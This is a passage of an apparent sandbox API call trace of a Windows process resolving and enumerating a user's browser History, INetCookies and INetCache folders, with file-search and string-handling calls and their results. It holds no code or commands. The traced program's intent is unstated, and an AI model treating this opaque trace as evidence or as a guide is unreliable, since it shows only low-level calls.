hFindFile=0x6a0f0) returned 1 [0052.700] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\", psz="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows", len=0x2f | out: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows") returned 1 [0052.700] SysReAllocStringLen (in: pbstr=0x13ffd98*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows", psz="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\", len=0x30 | out: pbstr=0x13ffd98*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\") returned 1 [0052.700] SysReAllocStringLen (in: pbstr=0x13ffaa8*="windows", psz="history", len=0x7 | out: pbstr=0x13ffaa8*="history") returned 1 [0052.700] FindFirstFileW (in: lpFileName="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\history", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x347b8201, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xc826dcac, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1b7a6e36, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 0x69ef0 [0052.700] FindNextFileW (in: hFindFile=0x69ef0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x347b8201, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xc826dcac, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1b7a6e36, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 0 [0052.700] GetLastError () returned 0x12 [0052.700] FindClose (in: hFindFile=0x69ef0 | out: hFindFile=0x69ef0) returned 1 [0052.700] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\", psz="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History", len=0x37 | out: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History") returned 1 [0052.700] SysReAllocStringLen (in: pbstr=0x13ffd98*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History", psz="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x38 | out: pbstr=0x13ffd98*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0052.701] SysReAllocStringLen (in: pbstr=0x13ffa98*=0x0, psz="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x38 | out: pbstr=0x13ffa98*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0052.701] SysReAllocStringLen (in: pbstr=0x13ffd98*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History\\", psz="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History", len=0x37 | out: pbstr=0x13ffd98*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History") returned 1 [0052.701] SysReAllocStringLen (in: pbstr=0x13ffd9c*=0x0, psz="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History", len=0x37 | out: pbstr=0x13ffd9c*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History") returned 1 [0052.701] SysReAllocStringLen (in: pbstr=0xe60078*=0x0, psz="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x38 | out: pbstr=0xe60078*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0052.701] SHGetFolderPathW (in: hwnd=0x0, csidl=33, hToken=0x0, dwFlags=0x0, pszPath=0xe63ea8 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies") returned 0x0 [0052.702] CharLowerBuffW (in: lpsz="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies", cchLength=0x3b | out: lpsz="c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\inetcookies") returned 0x3b [0052.702] SysReAllocStringLen (in: pbstr=0xe60094*=0x0, psz="c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\inetcookies", len=0x3b | out: pbstr=0xe60094*="c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\inetcookies") returned 1 [0052.702] SysReAllocStringLen (in: pbstr=0xe60098*=0x0, psz="c:", len=0x2 | out: pbstr=0xe60098*="c:") returned 1 [0052.702] SysReAllocStringLen (in: pbstr=0xe2267c*=0x0, psz="users", len=0x5 | out: pbstr=0xe2267c*="users") returned 1 [0052.702] SysReAllocStringLen (in: pbstr=0xe20790*=0x0, psz="fd1hvy", len=0x6 | out: pbstr=0xe20790*="fd1hvy") returned 1 [0052.702] SysReAllocStringLen (in: pbstr=0xe20818*=0x0, psz="appdata", len=0x7 | out: pbstr=0xe20818*="appdata") returned 1 [0052.702] SysReAllocStringLen (in: pbstr=0xe600cc*=0x0, psz="local", len=0x5 | out: pbstr=0xe600cc*="local") returned 1 [0052.703] SysReAllocStringLen (in: pbstr=0xe600d8*=0x0, psz="microsoft", len=0x9 | out: pbstr=0xe600d8*="microsoft") returned 1 [0052.703] SysReAllocStringLen (in: pbstr=0xe60108*=0x0, psz="windows", len=0x7 | out: pbstr=0xe60108*="windows") returned 1 [0052.703] SysReAllocStringLen (in: pbstr=0xe60114*=0x0, psz="inetcookies", len=0xb | out: pbstr=0xe60114*="inetcookies") returned 1 [0052.703] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="users", cchWideChar=5, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="usersryftless (x86)\x01", lpUsedDefaultChar=0x0) returned 5 [0052.703] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="fd1hvy", cchWideChar=6, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fd1hvyyftless (x86)\x01", lpUsedDefaultChar=0x0) returned 6 [0052.703] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="appdata", cchWideChar=7, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appdataftless (x86)\x01", lpUsedDefaultChar=0x0) returned 7 [0052.703] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="local", cchWideChar=5, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="localtaftless (x86)\x01", lpUsedDefaultChar=0x0) returned 5 [0052.703] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="microsoft", cchWideChar=9, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="microsoftless (x86)\x01", lpUsedDefaultChar=0x0) returned 9 [0052.703] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="windows", cchWideChar=7, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windowsftless (x86)\x01", lpUsedDefaultChar=0x0) returned 7 [0052.703] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="inetcookies", cchWideChar=11, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inetcookiesss (x86)\x01", lpUsedDefaultChar=0x0) returned 11 [0052.704] SysReAllocStringLen (in: pbstr=0x13ffab0*=0x0, psz="c:", len=0x2 | out: pbstr=0x13ffab0*="c:") returned 1 [0052.704] SysReAllocStringLen (in: pbstr=0x13ffd8c*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x13ffd8c*="c:\\") returned 1 [0052.704] SysReAllocStringLen (in: pbstr=0x13ffaa8*=0x0, psz="users", len=0x5 | out: pbstr=0x13ffaa8*="users") returned 1 [0052.704] FindFirstFileW (in: lpFileName="c:\\users", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x69ff0 [0052.704] FindNextFileW (in: hFindFile=0x69ff0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0052.704] GetLastError () returned 0x12 [0052.704] FindClose (in: hFindFile=0x69ff0 | out: hFindFile=0x69ff0) returned 1 [0052.704] SysReAllocStringLen (in: pbstr=0x13ffa9c*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x13ffa9c*="c:\\Users") returned 1 [0052.704] SysReAllocStringLen (in: pbstr=0x13ffd8c*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x13ffd8c*="c:\\Users\\") returned 1 [0052.705] SysReAllocStringLen (in: pbstr=0x13ffaa8*="users", psz="fd1hvy", len=0x6 | out: pbstr=0x13ffaa8*="fd1hvy") returned 1 [0052.705] FindFirstFileW (in: lpFileName="c:\\Users\\fd1hvy", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x6a130 [0052.705] FindNextFileW (in: hFindFile=0x6a130, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0 [0052.705] GetLastError () returned 0x12 [0052.705] FindClose (in: hFindFile=0x6a130 | out: hFindFile=0x6a130) returned 1 [0052.705] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\", psz="c:\\Users\\FD1HVy", len=0xf | out: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy") returned 1 [0052.705] SysReAllocStringLen (in: pbstr=0x13ffd8c*="c:\\Users\\FD1HVy", psz="c:\\Users\\FD1HVy\\", len=0x10 | out: pbstr=0x13ffd8c*="c:\\Users\\FD1HVy\\") returned 1 [0052.705] SysReAllocStringLen (in: pbstr=0x13ffaa8*="fd1hvy", psz="appdata", len=0x7 | out: pbstr=0x13ffaa8*="appdata") returned 1 [0052.705] FindFirstFileW (in: lpFileName="c:\\Users\\FD1HVy\\appdata", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b5a0677, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b5a0677, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x69ef0 [0052.705] FindNextFileW (in: hFindFile=0x69ef0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b5a0677, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b5a0677, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0052.705] GetLastError () returned 0x12 [0052.705] FindClose (in: hFindFile=0x69ef0 | out: hFindFile=0x69ef0) returned 1 [0052.706] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\", psz="c:\\Users\\FD1HVy\\AppData", len=0x17 | out: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\AppData") returned 1 [0052.706] SysReAllocStringLen (in: pbstr=0x13ffd8c*="c:\\Users\\FD1HVy\\AppData", psz="c:\\Users\\FD1HVy\\AppData\\", len=0x18 | out: pbstr=0x13ffd8c*="c:\\Users\\FD1HVy\\AppData\\") returned 1 [0052.706] SysReAllocStringLen (in: pbstr=0x13ffaa8*="appdata", psz="local", len=0x5 | out: pbstr=0x13ffaa8*="local") returned 1 [0052.706] FindFirstFileW (in: lpFileName="c:\\Users\\FD1HVy\\AppData\\local", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xb6f6a4d1, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0xb6f6a4d1, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0x69ef0 [0052.706] FindNextFileW (in: hFindFile=0x69ef0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xb6f6a4d1, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0xb6f6a4d1, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0 [0052.706] GetLastError () returned 0x12 [0052.706] FindClose (in: hFindFile=0x69ef0 | out: hFindFile=0x69ef0) returned 1 [0052.706] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\AppData\\", psz="c:\\Users\\FD1HVy\\AppData\\Local", len=0x1d | out: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\AppData\\Local") returned 1 [0052.706] SysReAllocStringLen (in: pbstr=0x13ffd8c*="c:\\Users\\FD1HVy\\AppData\\Local", psz="c:\\Users\\FD1HVy\\AppData\\Local\\", len=0x1e | out: pbstr=0x13ffd8c*="c:\\Users\\FD1HVy\\AppData\\Local\\") returned 1 [0052.706] SysReAllocStringLen (in: pbstr=0x13ffaa8*="local", psz="microsoft", len=0x9 | out: pbstr=0x13ffaa8*="microsoft") returned 1 [0052.706] FindFirstFileW (in: lpFileName="c:\\Users\\FD1HVy\\AppData\\Local\\microsoft", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xeff5a990, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xeff5a990, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0x6a2b0 [0052.706] FindNextFileW (in: hFindFile=0x6a2b0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xeff5a990, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xeff5a990, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0052.706] GetLastError () returned 0x12 [0052.706] FindClose (in: hFindFile=0x6a2b0 | out: hFindFile=0x6a2b0) returned 1 [0052.707] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\AppData\\Local\\", psz="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft", len=0x27 | out: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft") returned 1 [0052.707] SysReAllocStringLen (in: pbstr=0x13ffd8c*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft", psz="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\", len=0x28 | out: pbstr=0x13ffd8c*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\") returned 1 [0052.707] SysReAllocStringLen (in: pbstr=0x13ffaa8*="microsoft", psz="windows", len=0x7 | out: pbstr=0x13ffaa8*="windows") returned 1 [0052.707] FindFirstFileW (in: lpFileName="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\windows", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9fa64c01, ftLastAccessTime.dwHighDateTime=0x1d336de, ftLastWriteTime.dwLowDateTime=0x9fa64c01, ftLastWriteTime.dwHighDateTime=0x1d336de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x69f30 [0052.707] FindNextFileW (in: hFindFile=0x69f30, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9fa64c01, ftLastAccessTime.dwHighDateTime=0x1d336de, ftLastWriteTime.dwLowDateTime=0x9fa64c01, ftLastWriteTime.dwHighDateTime=0x1d336de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0052.707] GetLastError () returned 0x12 [0052.707] FindClose (in: hFindFile=0x69f30 | out: hFindFile=0x69f30) returned 1 [0052.707] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\", psz="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows", len=0x2f | out: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows") returned 1 [0052.707] SysReAllocStringLen (in: pbstr=0x13ffd8c*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows", psz="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\", len=0x30 | out: pbstr=0x13ffd8c*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\") returned 1 [0052.707] SysReAllocStringLen (in: pbstr=0x13ffaa8*="windows", psz="inetcookies", len=0xb | out: pbstr=0x13ffaa8*="inetcookies") returned 1 [0052.707] FindFirstFileW (in: lpFileName="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\inetcookies", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x347b8201, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xace8aa06, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xace8aa06, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 0x6a4f0 [0052.707] FindNextFileW (in: hFindFile=0x6a4f0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x347b8201, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xace8aa06, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xace8aa06, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 0 [0052.707] GetLastError () returned 0x12 [0052.707] FindClose (in: hFindFile=0x6a4f0 | out: hFindFile=0x6a4f0) returned 1 [0052.708] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\", psz="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies", len=0x3b | out: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies") returned 1 [0052.708] SysReAllocStringLen (in: pbstr=0x13ffd8c*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies", psz="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\", len=0x3c | out: pbstr=0x13ffd8c*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\") returned 1 [0052.708] SysReAllocStringLen (in: pbstr=0x13ffa98*=0x0, psz="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\", len=0x3c | out: pbstr=0x13ffa98*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\") returned 1 [0052.709] SysReAllocStringLen (in: pbstr=0x13ffd8c*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\", psz="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies", len=0x3b | out: pbstr=0x13ffd8c*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies") returned 1 [0052.709] SysReAllocStringLen (in: pbstr=0x13ffd90*=0x0, psz="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies", len=0x3b | out: pbstr=0x13ffd90*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies") returned 1 [0052.709] SysReAllocStringLen (in: pbstr=0xe6007c*=0x0, psz="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\", len=0x3c | out: pbstr=0xe6007c*="c:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\") returned 1 [0052.709] SHGetFolderPathW (in: hwnd=0x0, csidl=32, hToken=0x0, dwFlags=0x0, pszPath=0xe63ea8 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCache") returned 0x0 [0052.709] CharLowerBuffW (in: lpsz="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\INetCache", cchLength=0x39 | out: lpsz="c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\inetcache") returned 0x39 [0052.709] SysReAllocStringLen (in: pbstr=0xe60094*=0x0, psz="c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\inetcache", len=0x39 | out: pbstr=0xe60094*="c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\inetcache") returned 1 [0052.709] SysReAllocStringLen (in: pbstr=0xe60098*=0x0, psz="c:", len=0x2 | out: pbstr=0xe60098*="c:") returned 1 [0052.710] SysReAllocStringLen (in: pbstr=0xe20818*=0x0, psz="users", len=0x5 | out: pbstr=0xe20818*="users") returned 1 [0052.710] SysReAllocStringLen (in: pbstr=0xe20790*=0x0, psz="fd1hvy", len=0x6 | out: pbstr=0xe20790*="fd1hvy") returned 1 [0052.710] SysReAllocStringLen (in: pbstr=0xe2267c*=0x0, psz="appdata", len=0x7 | out: pbstr=0xe2267c*="appdata") returned 1 [0052.710] SysReAllocStringLen (in: pbstr=0xe600cc*=0x0, psz="local", len=0x5 | out: pbstr=0xe600cc*="local") returned 1 [0052.710] SysReAllocStringLen (in: pbstr=0xe600d8*=0x0, psz="microsoft", len=0x9 | out: pbstr=0xe600d8*="microsoft") returned 1 [0052.710] SysReAllocStringLen (in: pbstr=0xe60108*=0x0, psz="windows", len=0x7 | out: pbstr=0xe60108*="windows") returned 1 [0052.711] SysReAllocStringLen (in: pbstr=0xe60114*=0x0, psz="inetcache", len=0x9 | out: pbstr=0xe60114*="inetcache") returned 1 [0052.711] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="users", cchWideChar=5, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="usersookiesss (x86)\x01", lpUsedDefaultChar=0x0) returned 5 [0052.711] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="fd1hvy", cchWideChar=6, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fd1hvyokiesss (x86)\x01", lpUsedDefaultChar=0x0) returned 6 [0052.711] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="appdata", cchWideChar=7, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appdatakiesss (x86)\x01", lpUsedDefaultChar=0x0) returned 7 [0052.711] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="local", cchWideChar=5, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="localtakiesss (x86)\x01", lpUsedDefaultChar=0x0) returned 5 [0052.711] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="microsoft", cchWideChar=9, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="microsoftesss (x86)\x01", lpUsedDefaultChar=0x0) returned 9 [0052.711] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="windows", cchWideChar=7, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windowsftesss (x86)\x01", lpUsedDefaultChar=0x0) returned 7 [0052.711] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="inetcache", cchWideChar=9, lpMultiByteStr=0x13fea1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inetcacheesss (x86)\x01", lpUsedDefaultChar=0x0) returned 9 [0052.712] SysReAllocStringLen (in: pbstr=0x13ffab0*=0x0, psz="c:", len=0x2 | out: pbstr=0x13ffab0*="c:") returned 1 [0052.712] SysReAllocStringLen (in: pbstr=0x13ffd80*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x13ffd80*="c:\\") returned 1 [0052.712] SysReAllocStringLen (in: pbstr=0x13ffaa8*=0x0, psz="users", len=0x5 | out: pbstr=0x13ffaa8*="users") returned 1 